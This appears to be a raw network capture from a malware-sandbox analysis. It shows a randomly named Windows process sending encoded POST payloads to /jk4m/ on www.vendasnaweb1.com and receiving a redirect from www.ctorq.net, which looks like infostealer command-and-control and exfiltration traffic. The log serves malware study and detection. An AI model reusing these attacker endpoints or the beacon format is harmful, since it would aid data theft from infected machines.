Aug 28, 2024 14:03:08.492166042 CEST | 509 | OUT | GET /wl3e/?8le=9XPp_0_hUrF45X&4NZpb=u9FRs1l/3N7WVHEtnJgJBUEyIl9loYtb/3fG9DNnv3HsbAs5xmFcUO6EM9RRI1jF/q0HVxbcL2MkMMmvcW5YUJkmw7Lrsqc/ATJs0+pJV6RdOfO8AGIDWzk= HTTP/1.1
                                                            Host: www.ctorq.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Aug 28, 2024 14:03:08.969852924 CEST | 400 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 28 Aug 2024 12:03:08 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 260
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 38 6c 65 3d 39 58 50 70 5f 30 5f 68 55 72 46 34 35 58 26 34 4e 5a 70 62 3d 75 39 46 52 73 31 6c 2f 33 4e 37 57 56 48 45 74 6e 4a 67 4a 42 55 45 79 49 6c 39 6c 6f 59 74 62 2f 33 66 47 39 44 4e 6e 76 33 48 73 62 41 73 35 78 6d 46 63 55 4f 36 45 4d 39 52 52 49 31 6a 46 2f 71 30 48 56 78 62 63 4c 32 4d 6b 4d 4d 6d 76 63 57 35 59 55 4a 6b 6d 77 37 4c 72 73 71 63 2f 41 54 4a 73 30 2b 70 4a 56 36 52 64 4f 66 4f 38 41 47 49 44 57 7a 6b 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?8le=9XPp_0_hUrF45X&4NZpb=u9FRs1l/3N7WVHEtnJgJBUEyIl9loYtb/3fG9DNnv3HsbAs5xmFcUO6EM9RRI1jF/q0HVxbcL2MkMMmvcW5YUJkmw7Lrsqc/ATJs0+pJV6RdOfO8AGIDWzk="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49746 | 162.241.2.92 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 14:03:24.379448891 CEST | 785 | OUT | POST /jk4m/ HTTP/1.1
                                                            Host: www.vendasnaweb1.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.vendasnaweb1.com
                                                            Referer: http://www.vendasnaweb1.com/jk4m/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4c 57 7a 6a 6c 4e 50 44 4e 6b 71 65 4f 34 78 32 78 70 75 4d 43 6c 66 63 72 64 70 4f 6f 4c 6b 4b 65 4b 32 52 78 7a 6c 6d 35 42 49 4f 6c 59 45 33 75 58 2f 70 73 4a 59 54 41 5a 6d 53 41 4d 42 6c 7a 48 31 41 6f 6d 32 35 48 2f 6b 46 4b 74 41 6a 35 65 4c 39 44 49 4b 66 62 71 71 42 50 39 33 2f 76 72 64 59 53 72 43 2b 42 72 63 44 68 74 63 6e 63 44 61 6e 49 39 70 69 77 4f 78 50 63 58 71 66 6e 79 47 48 72 58 42 64 47 69 69 73 78 71 37 31 76 76 4f 55 34 79 6d 6e 44 34 34 65 4d 64 69 2f 4a 67 5a 6b 2f 41 67 6f 44 78 68 6b 5a 7a 63 52 69 4f 33 59 5a 44 32 4e 43 4f 4e 68 6d 70 71 69 72 77 3d 3d
                                                            Data Ascii: 4NZpb=LWzjlNPDNkqeO4x2xpuMClfcrdpOoLkKeK2Rxzlm5BIOlYE3uX/psJYTAZmSAMBlzH1Aom25H/kFKtAj5eL9DIKfbqqBP93/vrdYSrC+BrcDhtcncDanI9piwOxPcXqfnyGHrXBdGiisxq71vvOU4ymnD44eMdi/JgZk/AgoDxhkZzcRiO3YZD2NCONhmpqirw==
Aug 28, 2024 14:03:25.070198059 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:03:24 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            Content-Length: 15931
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df [TRUNCATED]
                                                            Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD4HS]20$B'6bgvtr;*R&d&'P&|a>v:2ZuK)WE)I4<m'8MaiE:-jL:097pzeRD/RO-'3lE|fs=kswX}tsgr6Bg_a7YLzz7 [pN!Fmk&]~k;g}5kp/v?4M'k([ZfTH7{o@QFqGRZ'`Vv?8iKB,w`[N>o*j'M,$CcxsLXgCh:YXW0%_#p5a2iZ,pn?e{#J|U=<5hE8"WALMBp8qeazx_fuh/c[M3'Upj"hY}W1_<p84kv*jc
                                                            Aug 28, 2024 14:03:25.070369959 CEST1236INData Raw: c9 e2 5a b8 28 f4 30 b5 df 72 7e d9 8b f0 3b 1e f7 7e cb c7 10 8c 7f cb bb 41 c0 f1 7b ce 2e ca 48 6d 6f da e8 41 5a e3 8f af 3b e1 eb 87 b0 7c cc 36 ce bd da f6 53 09 b2 91 d0 f8 ec b3 d7 db cc fa f8 1d f5 03 fc 46 e7 17 1b e7 ee c6 f9 6c e3 0c
                                                            Data Ascii: Z(0r~;~A{.HmoAZ;|6SFl[W7"NAH{uW:Zh_ t[/>aa-WBYzL][0zHggeSQemd^4;gA#-3HHAztrdCF+w|*
                                                            Aug 28, 2024 14:03:25.070375919 CEST1236INData Raw: ad 75 bf c3 a1 48 6e 6d 03 5b 8a de d2 b9 a3 91 56 d6 19 86 6d 50 91 4c 23 63 a1 55 68 40 32 27 26 f0 08 cb 8c c5 a8 ae b0 6e 1f 53 c5 26 22 66 1e 92 b4 76 ab e6 c5 06 29 8a 94 da 70 c2 4c 9d 6e 14 2c 09 16 39 4d a1 90 18 93 8d c1 88 45 b7 71 b1
                                                            Data Ascii: uHnm[VmPL#cUh@2'&nS&"fv)pLn,9MEqB@6p,n?Q1>U-Mi{Ky.(zs=-OMumExx8gV):H_$s]lJj!'`V2)OI60}h
                                                            Aug 28, 2024 14:03:25.071247101 CEST1236INData Raw: ef 16 93 75 82 e0 d3 0a 5c c9 46 20 e7 07 53 84 ca 72 37 f7 7d 99 61 2a 02 c4 56 30 d8 9d e4 aa ef ff 95 1c 62 a3 a7 61 67 b0 b9 e6 60 79 33 e5 c2 36 54 ef 19 14 7a 29 c2 25 6e a0 d0 94 43 a4 0d 73 42 ab 30 57 16 dc 6b 91 66 da 38 a6 dc 0e c9 7d
                                                            Data Ascii: u\F Sr7}a*V0bag`y36Tz)%nCsB0Wkf8}SuaA&F5=F.c:u'4UTEw7k{+M31"{:s+n>$TXOeW6La%/^%68D0HJ
                                                            Aug 28, 2024 14:03:25.071254015 CEST1236INData Raw: 36 e1 27 41 70 11 8d d8 a0 fa 99 52 13 8f c2 a0 d9 e9 f6 9b 9d cb f3 7d 59 9c 99 5b 30 b4 13 78 b8 f3 11 eb 3c 9a b8 02 0e 2e 9a 9d f3 c7 f2 bb 05 f0 19 bb bc 78 34 71 09 7c 85 d8 bd b3 cd f4 d2 22 b4 d8 2a 1d eb 28 b7 61 37 bb 2b 33 4a f5 ec 4c
                                                            Data Ascii: 6'ApR}Y[0x<.x4q|"*(a7+3JLE0,x{6f[}.K3=?#u2wBshwV1Au0$i5rc@r`7hQt+>JsT*)c(ZFZ>Ca36v9|;~;~G:!e
                                                            Aug 28, 2024 14:03:25.072491884 CEST1236INData Raw: 08 4e 0d 70 cc 8b c6 5d e8 42 75 9e cc d1 39 3a b7 8b 02 6d 98 8a 4b 0e e7 57 fb c6 da aa 61 e9 08 8c 2f 89 46 fb 4b 44 9c 38 d4 00 fd 5e a8 82 e9 17 23 1e 8d ce 0e b1 7f 90 1e 04 3c b8 dc f6 c8 a6 28 4b b1 3d fb 4b e0 9d 71 74 08 7b 33 3b 38 bf
                                                            Data Ascii: Np]Bu9:mKWa/FKD8^#<(K=Kqt{3;8Yn2SFg3B+o7GZ9Ns8;$0W+IEH-yg>:;mq3KZYU;3q#V?ovniSw
                                                            Aug 28, 2024 14:03:25.072498083 CEST1236INData Raw: 27 25 84 75 33 09 94 c6 52 8f 98 44 04 ad 1c 28 47 ad f8 00 08 d4 45 88 41 65 e2 54 70 58 64 75 ba 97 3e 8d dc 87 d3 04 0c d4 47 9a cf 1a d8 20 65 26 16 2a 24 01 3e b5 10 c2 0a 07 74 24 75 74 6b f1 35 63 9c fb 6d 3b 8d 8c 27 cc d4 1f b4 f1 1c 71
                                                            Data Ascii: '%u3RD(GEAeTpXdu>G e&*$>t$utk5cm;'quNcithQf(ZAB"i1)b5\$1bD>'/iS^p[VW2\3T\[Rfhf:zEwmnLhn V7MU{K0.5@qa
                                                            Aug 28, 2024 14:03:25.073668957 CEST1236INData Raw: 6e 05 46 c6 24 d0 0c 1d 79 24 ce 2a bf 02 6b 22 70 6f d4 00 3f 12 6b 95 5f 81 25 f3 54 28 9d 2f 41 b5 61 2a 3e 76 d6 ca da c7 7b 30 b4 b9 79 5e 8b a2 b4 aa 83 88 13 87 eb 03 50 e5 42 8f 44 df 2a db ab f5 93 91 b7 cb f6 39 62 e9 be 63 25 7f 58 b4
                                                            Data Ascii: nF$y$*k"po?k_%T(/Aa*>v{0y^PBD*9bc%XSaf@"}'`nJ3#q.8{*ZEcg,;2}?-#t4*gJ\v]=B+fLc.lBcfd4>IP14tZTt+
                                                            Aug 28, 2024 14:03:25.073676109 CEST1236INData Raw: e6 b3 07 2c 22 c9 d2 ac 1e b4 2e 2f ce 70 e4 26 59 9e c8 17 a4 5e ef 4c a6 84 62 a8 8b 81 06 f9 1c 4f 67 fd 6e a3 49 3a 65 64 81 e3 66 12 81 94 36 c8 b9 0c 4d 41 c4 89 0b c9 79 10 1c 33 02 61 8b c7 50 69 57 df 5d 64 a3 d1 98 3b b8 73 94 43 a4 0d
                                                            Data Ascii: ,"./p&Y^LbOgnI:edf6MAy3aPiW]d;sCsB+O9b^,<(7R{FLFc#$0K.ncspxI1HMyLgzbm.M,D<e&4*I:3-3
                                                            Aug 28, 2024 14:03:25.075182915 CEST1236INData Raw: 8c 5e 4a 34 89 1c d6 12 e7 32 1b b6 db 2c 13 ad 69 4b 9b b8 5d 23 89 81 f1 fa 65 02 8a 33 ab d8 14 46 9d 56 a4 d3 36 fa f7 bd d5 0a 13 db 37 1b 48 df 70 e1 fe f6 f3 77 35 e2 66 19 0c 6b 2c cb a4 88 0a d2 6d 63 f9 17 77 a9 c4 27 e1 24 be fd fc f6
                                                            Data Ascii: ^J42,iK]#e3FV67Hpw5fk,mcw'$G`Vdr:b)B%F"\(7;z'ySaDqi9)ie:/?|FB-g>>;ZqAEuraMTGX"ssE6iu+qfi]
                                                            Aug 28, 2024 14:03:25.078080893 CEST1236INData Raw: d7 94 92 3f 6b 1d 4b 20 bf b0 98 fc c0 14 8b c1 90 ba d2 36 32 22 73 0d 42 e9 cd 1f 4e ae 97 f7 9b 6b 31 36 2c 05 82 e2 0c 6b 5e 18 8b ca 4c a7 d3 56 5c a0 38 16 a7 25 46 a1 90 b2 ad c4 a5 f2 8f 82 0f ff fc cb 0f f4 af fd 9f be fe b7 9f bf fe be
                                                            Data Ascii: ?kK 62"sBNk16,k^LV\8%FPXjd*KS1aHHfa"8Un$ro|REt$utkK5:H&f8C2)6::6V8Y:bQQqfXP1:we&pLZHNga7


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49747 | 162.241.2.92 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 14:03:26.911576986 CEST | 805 | OUT | POST /jk4m/ HTTP/1.1
                                                            Host: www.vendasnaweb1.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.vendasnaweb1.com
                                                            Referer: http://www.vendasnaweb1.com/jk4m/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4c 57 7a 6a 6c 4e 50 44 4e 6b 71 65 4f 59 42 32 39 71 47 4d 4a 6c 66 62 6e 39 70 4f 2f 62 6b 47 65 4b 36 52 78 33 38 2b 34 33 67 4f 6c 35 30 33 76 54 54 70 72 4a 59 54 59 70 6d 4f 50 73 42 51 7a 48 70 69 6f 69 32 35 48 2f 67 46 4b 73 77 6a 35 76 4c 79 44 59 4b 5a 51 4b 71 44 41 64 33 2f 76 72 64 59 53 72 58 54 42 6f 73 44 68 5a 59 6e 4f 33 4f 6b 57 74 70 6a 36 75 78 50 57 33 71 62 6e 79 48 69 72 54 68 6e 47 67 61 73 78 72 4c 31 76 37 36 58 32 79 6d 2b 4e 59 35 7a 4c 39 66 7a 46 43 4d 66 35 43 68 48 4c 51 5a 68 56 56 4e 4c 7a 2f 57 50 4c 44 53 2b 66 4a 45 56 72 71 58 72 77 78 46 37 45 42 46 6c 2b 58 44 77 4a 6a 37 45 47 4d 6b 58 51 6f 6f 3d
                                                            Data Ascii: 4NZpb=LWzjlNPDNkqeOYB29qGMJlfbn9pO/bkGeK6Rx38+43gOl503vTTprJYTYpmOPsBQzHpioi25H/gFKswj5vLyDYKZQKqDAd3/vrdYSrXTBosDhZYnO3OkWtpj6uxPW3qbnyHirThnGgasxrL1v76X2ym+NY5zL9fzFCMf5ChHLQZhVVNLz/WPLDS+fJEVrqXrwxF7EBFl+XDwJj7EGMkXQoo=
Aug 28, 2024 14:03:27.598881006 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 28 Aug 2024 12:03:27 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            Content-Length: 15931
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df [TRUNCATED]
                                                            Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD4HS]20$B'6bgvtr;*R&d&'P&|a>v:2ZuK)WE)I4<m'8MaiE:-jL:097pzeRD/RO-'3lE|fs=kswX}tsgr6Bg_a7YLzz7 [pN!Fmk&]~k;g}5kp/v?4M'k([ZfTH7{o@QFqGRZ'`Vv?8iKB,w`[N>o*j'M,$CcxsLXgCh:YXW0%_#p5a2iZ,pn?e{#J|U=<5hE8"WALMBp8qeazx_fuh/c[M3'Upj"hY}W1_<p84kv*jc
                                                            Aug 28, 2024 14:03:27.599123001 CEST1236INData Raw: c9 e2 5a b8 28 f4 30 b5 df 72 7e d9 8b f0 3b 1e f7 7e cb c7 10 8c 7f cb bb 41 c0 f1 7b ce 2e ca 48 6d 6f da e8 41 5a e3 8f af 3b e1 eb 87 b0 7c cc 36 ce bd da f6 53 09 b2 91 d0 f8 ec b3 d7 db cc fa f8 1d f5 03 fc 46 e7 17 1b e7 ee c6 f9 6c e3 0c
                                                            Data Ascii: Z(0r~;~A{.HmoAZ;|6SFl[W7"NAH{uW:Zh_ t[/>aa-WBYzL][0zHggeSQemd^4;gA#-3HHAztrdCF+w|*
                                                            Aug 28, 2024 14:03:27.599134922 CEST448INData Raw: ad 75 bf c3 a1 48 6e 6d 03 5b 8a de d2 b9 a3 91 56 d6 19 86 6d 50 91 4c 23 63 a1 55 68 40 32 27 26 f0 08 cb 8c c5 a8 ae b0 6e 1f 53 c5 26 22 66 1e 92 b4 76 ab e6 c5 06 29 8a 94 da 70 c2 4c 9d 6e 14 2c 09 16 39 4d a1 90 18 93 8d c1 88 45 b7 71 b1
                                                            Data Ascii: uHnm[VmPL#cUh@2'&nS&"fv)pLn,9MEqB@6p,n?Q1>U-Mi{Ky.(zs=-OMumExx8gV):H_$s]lJj!'`V2)OI60}h
                                                            Aug 28, 2024 14:03:27.599647999 CEST | 1236 | IN | Data Raw: 19 a5 99 01 0b 8e d2 48 4b 6d fc 1f e5 0c 76 a6 dd 26 89 72 63 b0 d3 1b ff d2 58 80 44 52 64 34 63 be 9f ff d6 4f 7f e8 74 5a 57 bd d6 f9 65 7f 72 d9 0a 7a 57 f2 ac 75 de eb d1 e2 8b 94 ba 9d 73 ff 2d 02 e7 c4 7f 12 4c eb 4f 3a ad 8b de c5 5f 3a
                                                            Data Ascii: HKmv&rcXDRd4cOtZWerzWus-LO:_:V.)./oNB_rQTOi]bUuE,+z"o~.gfB2:--?'K,D'8Gd&q?C2EZYL%DXx9
                                                            Aug 28, 2024 14:03:27.599659920 CEST | 1236 | IN | Data Raw: 1e 6f 3b 96 9a b9 b0 c0 be 3f b9 6e 5b 37 93 70 73 72 5d fc 25 82 0f 4f 57 00 8a 4d 44 cc 9c 40 68 54 fb 16 85 f4 a2 d3 c8 da d3 9b 93 56 45 1a a9 0a 52 e1 20 7d f7 4e b2 11 c8 b9 9e 80 41 02 d3 82 4d 38 32 c0 6e e9 14 1d 75 ff 54 38 0e 36 32 22
                                                            Data Ascii: o;?n[7psr]%OWMD@hTVER }NAM82nuT862"96lVUPuZK.^[ZN>.ueCq@.ERcu);&sY?9y?-ai!<e*QC6"nS.$/i/vf3gEn!Is6x
                                                            Aug 28, 2024 14:03:27.600516081 CEST | 1236 | IN | Data Raw: c4 ec b1 46 3c 2b 3e c0 7c 75 0a 3b 90 96 49 98 10 43 75 4e b7 75 de 3d 5b e6 29 6d 52 26 2b f3 26 cc d4 29 9d 66 94 66 06 2c 38 ba ce a2 8b ba 05 a3 24 8f e1 e9 10 be 6a 01 e0 e0 ce 51 26 45 ac 68 84 f3 83 99 af 23 61 19 d9 49 94 30 76 9b 69 fe
                                                            Data Ascii: F<+>|u;ICuNu=[)mR&+&)ff,8$jQ&Eh#aI0vidYEPuDl$Nj!rB96l*U-XEK[Aj:1K>uF#K;j3n`]w;No3-0zG9YhPz'kn6'1BzgAi
                                                            Aug 28, 2024 14:03:27.600528955 CEST | 1236 | IN | Data Raw: 96 9b 4c 1e f4 4a b1 aa 6e 70 8e 13 9c 6f b0 47 96 67 c8 be ff a8 69 cb 6e 23 6d 38 b0 fc ee 91 4e 38 02 8e d5 39 3f 5b 9b 02 63 fd 33 fc df 20 67 cb e6 a8 52 d0 3c ef 1e ed 51 9e db db 23 46 ec 35 3b 9d ee 7a c4 ab ab e6 25 ca 7c d5 5d 77 3e 3f
                                                            Data Ascii: LJnpoGgin#m8N89?[c3 gR<Q#F5;z%|]w>?k^mZgL0x~{Fhv;/:~Y{{-^wz;Gmh~?@Kgnou6ps:mOqF'^w~yu<wNs9Gg1
                                                            Aug 28, 2024 14:03:27.601433992 CEST | 1236 | IN | Data Raw: bc 16 69 a6 8d 63 6a d5 aa e8 bb fb ba 6f 29 ff 09 9a 54 c1 bf a8 34 55 0d fe 33 15 0a a7 09 18 a8 87 4a bb fa 5a ad c6 c6 bd 80 dc 0c 8c 73 29 1b 0d a4 73 47 a7 82 bb 24 24 13 66 ea 94 4e 33 8a a3 ce 24 50 1a 4b 3d 62 92 fa 5e 0e c9 53 2b 3e 40
                                                            Data Ascii: icjo)T4U3JZs)sG$$fN3$PK=b^S+>@cb$G1:#g-nr->Ew*6$v?o.&o3kFk\GnG,G6d,8Z>P:b5y,/01B7)+{#)p|(mR&
                                                            Aug 28, 2024 14:03:27.601447105 CEST | 1236 | IN | Data Raw: 9e a7 c7 aa ba 02 79 22 26 82 53 03 fc 59 c8 ab ea 0a 64 99 a7 42 e9 7c d9 42 1b a6 e2 e7 a9 52 89 f4 78 47 96 8e 10 fc 05 1a 16 40 55 fd 44 9c 38 34 01 80 5a d8 e2 39 bd b6 40 f6 ee e8 23 fb 6c 83 ec 73 d9 d2 df cf 5b d5 43 88 bd b3 7c 5c 93 2d
                                                            Data Ascii: y"&SYdB|BRxG@UD84Z9@#ls[C|\-]dcZ#fuHV0,><CU`(<5SbYy*,?cp*p'b"8fL:e$0.66:W|>V\U<]F8qUFc(W\,X
                                                            Aug 28, 2024 14:03:27.601460934 CEST | 776 | IN | Data Raw: b0 a5 4a 34 93 4c 28 f4 b8 71 92 6c 45 b7 80 42 a5 5d 7d 1b 2d 02 85 cb 6f 54 be 49 18 bb c6 ca bc 53 c1 5d 12 92 c0 1b 14 bf c1 d2 bf 45 da a3 b2 75 1f c8 b6 2c 2d 66 79 62 ed 93 c4 f2 dc 76 b4 1a 69 3e 2b 07 46 d1 1a 2f ad 5a 31 53 85 6c 41 29
                                                            Data Ascii: J4L(qlEB]}-oTIS]Eu,-fybvi>+F/Z1SlA)H}Y`&Jd;PYVSEnVce0vRfPEhlvv+)\Jb:'KFXe8KB=9#E(c"If:wCnX%cAjTt3q
                                                            Aug 28, 2024 14:03:27.606451988 CEST | 1236 | IN | Data Raw: 07 74 12 87 3b 84 0c fc 4f a9 e4 da 8c 5e 4a 34 89 1c d6 12 e7 32 1b b6 db 2c 13 ad 69 4b 9b b8 5d 23 89 81 f1 fa 65 02 8a 33 ab d8 14 46 9d 56 a4 d3 36 fa f7 bd d5 0a 13 db 37 1b 48 df 70 e1 fe f6 f3 77 35 e2 66 19 0c 6b 2c cb a4 88 0a d2 6d 63
                                                            Data Ascii: t;O^J42,iK]#e3FV67Hpw5fk,mcw'$G`Vdr:b)B%F"\(7;z'ySaDqi9)ie:/?|FB-g>>;ZqAEuraMTGX"ssE6iu+


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.4 | 49748 | 162.241.2.92 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:03:29.447824955 CEST | 10887 | OUT | POST /jk4m/ HTTP/1.1
                                                            Host: www.vendasnaweb1.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.vendasnaweb1.com
                                                            Referer: http://www.vendasnaweb1.com/jk4m/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4c 57 7a 6a 6c 4e 50 44 4e 6b 71 65 4f 59 42 32 39 71 47 4d 4a 6c 66 62 6e 39 70 4f 2f 62 6b 47 65 4b 36 52 78 33 38 2b 34 33 6f 4f 6b 4c 38 33 75 79 54 70 71 4a 59 54 47 5a 6d 65 50 73 42 33 7a 48 78 6d 6f 69 79 48 48 38 49 46 4d 4b 4d 6a 2f 64 6a 79 4e 59 4b 5a 66 71 71 47 50 39 33 75 76 72 74 45 53 72 48 54 42 6f 73 44 68 59 6f 6e 4e 6a 61 6b 52 64 70 69 77 4f 78 39 63 58 71 2f 6e 78 32 66 72 54 6c 33 47 7a 53 73 2f 72 62 31 74 49 53 58 36 79 6d 38 4b 59 35 72 4c 39 53 78 46 43 52 6b 35 44 45 61 4c 51 39 68 56 52 77 30 6c 37 43 48 66 52 6d 64 42 49 30 42 72 71 7a 39 2b 47 77 41 53 51 6b 77 73 6e 54 42 4c 52 61 79 58 4f 64 52 50 65 47 71 35 42 50 41 6b 50 67 6a 53 4d 61 78 76 6c 30 4d 38 50 77 35 56 75 75 5a 42 47 48 6f 45 37 68 43 57 6c 47 43 46 35 4d 71 32 45 6d 43 2b 43 4d 6f 63 4c 74 4f 6e 48 53 2b 4c 37 38 55 6d 4b 6a 53 70 30 50 69 46 4c 44 46 68 62 58 72 45 59 34 65 57 72 75 4c 58 6a 57 53 74 2b 4f 54 48 56 5a 62 6e 57 4d 4a 6f 70 30 46 64 53 38 4a 35 58 77 4b 32 38 7a 4f [TRUNCATED]
